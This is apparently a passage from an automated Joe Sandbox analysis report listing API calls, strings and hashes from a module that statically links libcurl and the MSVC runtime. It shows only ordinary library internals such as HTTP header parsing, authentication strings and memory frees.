                                                                                                                                            • __allrem.LIBCMT ref: 6B79D114
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D122
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D132
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B79D144
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D169
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D17B
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D1A0
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D1B2
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D1C9
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D1DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                            • API String ID: 3299120379-2102732564
                                                                                                                                            • Opcode ID: 9f0b845441cf1b47ffc9a87c18708b513b9748a98fcc0313dc99656661b8741b
                                                                                                                                            • Instruction ID: 812bc81a8c3946722238cbfd7ad43fbdfc1b8fa48717ed0faee7443c114ec801
                                                                                                                                            • Opcode Fuzzy Hash: 9f0b845441cf1b47ffc9a87c18708b513b9748a98fcc0313dc99656661b8741b
                                                                                                                                            • Instruction Fuzzy Hash: 5041D777BC066436EA3079683E17FAF232DDBC1B68F120469FB14B7181966C691202FD
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779245
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792AB
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792BD
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792D1
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779364
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779376
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77938A
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77939F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                                            APIs
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B792B8F
                                                                                                                                            • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B792CCC
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_allcurl_strequal
                                                                                                                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78AB26
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78AB3C
                                                                                                                                            • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B78AC1A
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B78AC3E
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B78AC62
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B78AC86
                                                                                                                                            • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B78ACAA
                                                                                                                                            • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B78ACCE
                                                                                                                                            • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B78ACE2
                                                                                                                                            • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B78E55E), ref: 6B78ACF6
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                                            • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:$^xk
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D566
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B781696,?), ref: 6B79D59D
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B781696,?), ref: 6B79D5B0
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D5FF
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D623
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D636
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D677
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D6D5
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D702
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D715
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D76F
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D891
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D8A1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D8C7
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B79D9A1
                                                                                                                                            Strings
                                                                                                                                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B79D5A5
                                                                                                                                            • ** Resuming transfer from byte position %I64d, xrefs: 6B79D592
                                                                                                                                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B79D996
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B78CFF2
                                                                                                                                            • curl_maprintf.LIBCURL(%s:%s,?,6B7DB98E,?,00000000), ref: 6B78D106
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B78D180
                                                                                                                                              • Part of subcall function 6B7948E0: curl_mvaprintf.LIBCURL(?,?,?,6B7766CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B7948EA
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B78B61C
                                                                                                                                            • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B78B6A0
                                                                                                                                            • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B78B704
                                                                                                                                            • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B78B75D
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B7AE994
                                                                                                                                              • Part of subcall function 6B78B530: ___from_strstr_to_strchr.LIBCMT ref: 6B78B55B
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B7AE8CD
                                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B7DBF70), ref: 6B7AEAC6
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            • read function returned funny value, xrefs: 6B7AEA35
                                                                                                                                            • operation aborted by callback, xrefs: 6B7AE945
                                                                                                                                            • Successfully compiled trailers., xrefs: 6B7AE8BF
                                                                                                                                            • Signaling end of chunked upload after trailers., xrefs: 6B7AEBBE
                                                                                                                                            • operation aborted by trailing headers callback, xrefs: 6B7AE96F
                                                                                                                                            • Signaling end of chunked upload via terminating chunk., xrefs: 6B7AEB1B
                                                                                                                                            • Moving trailers state machine from initialized to sending., xrefs: 6B7AE842
                                                                                                                                            • Read callback asked for PAUSE when not supported!, xrefs: 6B7AE9DC
                                                                                                                                            • %zx%s, xrefs: 6B7AEAA9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                                            • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                                            • API String ID: 2651734479-586909597
                                                                                                                                            • Opcode ID: 5a4aa2f3713d083ae6bf0c5e8298d6a7eb799032b4ca0d193b14b942e2647ea6
                                                                                                                                            • Instruction ID: 2fd349d7a4e3bd0b68c428f6b6d92247e5772ac5013598b102213aeddc71382f
                                                                                                                                            • Opcode Fuzzy Hash: 5a4aa2f3713d083ae6bf0c5e8298d6a7eb799032b4ca0d193b14b942e2647ea6
                                                                                                                                            • Instruction Fuzzy Hash: B9A11971E04209ABDB44CF74D99ABEEFBB4EF05318F100269F819A7280D77D25958BE1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7927F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B792801
                                                                                                                                              • Part of subcall function 6B7927F0: curl_slist_free_all.LIBCURL(?), ref: 6B792812
                                                                                                                                            • curl_mime_init.LIBCURL(?), ref: 6B77B187
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2112604817-0
                                                                                                                                            • Opcode ID: c55c96c048746ae4235705df83b12e092d5d20887ffc6fa75dc8f7bb62228f08
                                                                                                                                            • Instruction ID: cc9a6a58afd2e77261ace391b2eb3d09a5f91ee0585464866924fa5c944fd964
                                                                                                                                            • Opcode Fuzzy Hash: c55c96c048746ae4235705df83b12e092d5d20887ffc6fa75dc8f7bb62228f08
                                                                                                                                            • Instruction Fuzzy Hash: 54812372E05615ABCF31AA64AE66B9E77A8EF04324F0502B4FC18A7341E72DFD5083D1
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D6C
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D7E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5D90
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DA2
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DB4
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DC6
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DD8
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DEA
                                                                                                                                            • _free.LIBCMT ref: 6B7D5DFC
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E0E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E20
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E32
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 46efe5b3ca2eab215293cdec72c99cfd784c7ff5eb69b0c15634db775c1a4452
                                                                                                                                            • Instruction ID: 14d1fbe1429216c2a56b88a64d546f7cd1e9369d5b517401fcb4ffa083a2ee4b
                                                                                                                                            • Opcode Fuzzy Hash: 46efe5b3ca2eab215293cdec72c99cfd784c7ff5eb69b0c15634db775c1a4452
                                                                                                                                            • Instruction Fuzzy Hash: C121F7315046449F9B18DF78F6DAD1F73F9FA063943A0086EF569DB540DB38F8848A68
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B7AAEAE), ref: 6B7AACCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B7AACE8
                                                                                                                                            • _strpbrk.LIBCMT ref: 6B7AACFC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc_strpbrk
                                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                            • API String ID: 1657965159-3327535076
                                                                                                                                            • Opcode ID: 003c6f5c65cab84d4f9946ebbb62958475896aa83bc968491fd1934cf4162902
                                                                                                                                            • Instruction ID: 52afe4d1fb9ea533ac9ff9b189414918711119e693b6a5dd699c983bd38220c7
                                                                                                                                            • Opcode Fuzzy Hash: 003c6f5c65cab84d4f9946ebbb62958475896aa83bc968491fd1934cf4162902
                                                                                                                                            • Instruction Fuzzy Hash: 1C413832704301ABEF014E78AD44BAEB768EF82256F1042FAFC85D7345EA77D50697A0
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D51CC
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D6C
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D7E
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5D90
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DA2
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DB4
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DC6
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DD8
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DEA
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5DFC
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E0E
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E20
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E32
                                                                                                                                              • Part of subcall function 6B7D5D4F: _free.LIBCMT ref: 6B7D5E44
                                                                                                                                            • _free.LIBCMT ref: 6B7D51EE
                                                                                                                                            • _free.LIBCMT ref: 6B7D5203
                                                                                                                                            • _free.LIBCMT ref: 6B7D520E
                                                                                                                                            • _free.LIBCMT ref: 6B7D5230
                                                                                                                                            • _free.LIBCMT ref: 6B7D5243
                                                                                                                                            • _free.LIBCMT ref: 6B7D5251
                                                                                                                                            • _free.LIBCMT ref: 6B7D525C
                                                                                                                                            • _free.LIBCMT ref: 6B7D5294
                                                                                                                                            • _free.LIBCMT ref: 6B7D529B
                                                                                                                                            • _free.LIBCMT ref: 6B7D52B8
                                                                                                                                            • _free.LIBCMT ref: 6B7D52D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: d173043cf0caf4e2aabe297888cb66d7d8b9567558537c3d0964a34ca68b0c54
                                                                                                                                            • Instruction ID: d68e6a8a0c28b9918332e80b02e4607833f77abf31be8d1c11dc3fa159fdf97d
                                                                                                                                            • Opcode Fuzzy Hash: d173043cf0caf4e2aabe297888cb66d7d8b9567558537c3d0964a34ca68b0c54
                                                                                                                                            • Instruction Fuzzy Hash: A83139716042009FEB159B78EA89B4F73E9FF01394F6048AAF569DA150DB38F948CB21
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7CD46B: CreateFileW.KERNEL32(00000000,00000000,?,6B7CD873,?,?,00000000,?,6B7CD873,00000000,0000000C), ref: 6B7CD488
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B7CD8DE
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD8E5
                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 6B7CD8F1
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B7CD8FB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD904
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6B7CD924
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6B7CDA71
                                                                                                                                            • GetLastError.KERNEL32 ref: 6B7CDAA3
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CDAAA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                            • Opcode ID: f74be632f1ae5abdb9af131d99c85fc2f871e962d58fd2a0675b6def344888ee
                                                                                                                                            • Instruction ID: ef62104dbc36ab33d1bb8874b4cc57fc0a88ed0d8e3197df53331b63f3c17931
                                                                                                                                            • Opcode Fuzzy Hash: f74be632f1ae5abdb9af131d99c85fc2f871e962d58fd2a0675b6def344888ee
                                                                                                                                            • Instruction Fuzzy Hash: C4A13432A841149FCF189F78C9557AE3BE0AB4B324F1501ADF821AB390D738D902C75A
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DA0F
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DA4D
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%2I64d:%02I64d:%02I64d,6B781696,?,00000000,?,?,6B781696,?,6B781696,0000003C,00000000,00000000,?,00000E10), ref: 6B79DAA5
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DABD
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79DAF2
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%3I64dd %02I64dh,00000000,6B781696,00000000,?,?,6B781696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B79DB07
                                                                                                                                            • curl_msnprintf.LIBCURL(6B781696,00000009,%7I64dd,00000000,?,?,6B781696,00015180,00000000,?,6B781696,00000E10,00000000,?,6B781696,?), ref: 6B79DB22
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
